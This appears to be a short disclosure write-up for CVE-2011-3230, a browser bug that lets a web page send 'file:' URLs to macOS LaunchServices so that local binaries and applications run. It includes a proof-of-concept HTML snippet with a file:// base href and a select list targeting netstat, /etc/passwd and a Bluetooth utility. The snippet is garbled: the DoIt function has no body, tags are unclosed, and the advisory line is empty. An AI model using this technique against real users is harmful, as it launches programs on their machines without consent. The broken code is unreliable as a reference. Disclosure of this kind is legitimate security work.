CVE-2011-3230 - Launch any file path from web page


CVE: CVE-2011-3230
Found By: Aaron Sigel

There's not a ton to say about this bug aside from "Yikes"!  I think the PoC speaks for itself.  This allows you to send any "file:" url to LaunchServices, which will run binaries, launch applications, or open content in the default application, all from a web page.  The only caveat is that since LaunchServices will check for the quarantine bit, you cannot directly push a binary to the browser and launch it.  Other than that, you can run or launch anything you can access by using the method in the html provided below.


<base href="file://">
 function DoIt() {
<select id="cmdToRun">
 <option value="/usr/sbin/netstat">Launch /usr/bin/netstat</option>
 <option value="/etc/passwd">Launch /etc/passwd</option>
 <option value="/Applications/Utilities/Bluetooth File">
Launch Bluetooth File</option>
<br />
<input type=button value="Launch" onclick="DoIt()">
<br />

Apple's advisory: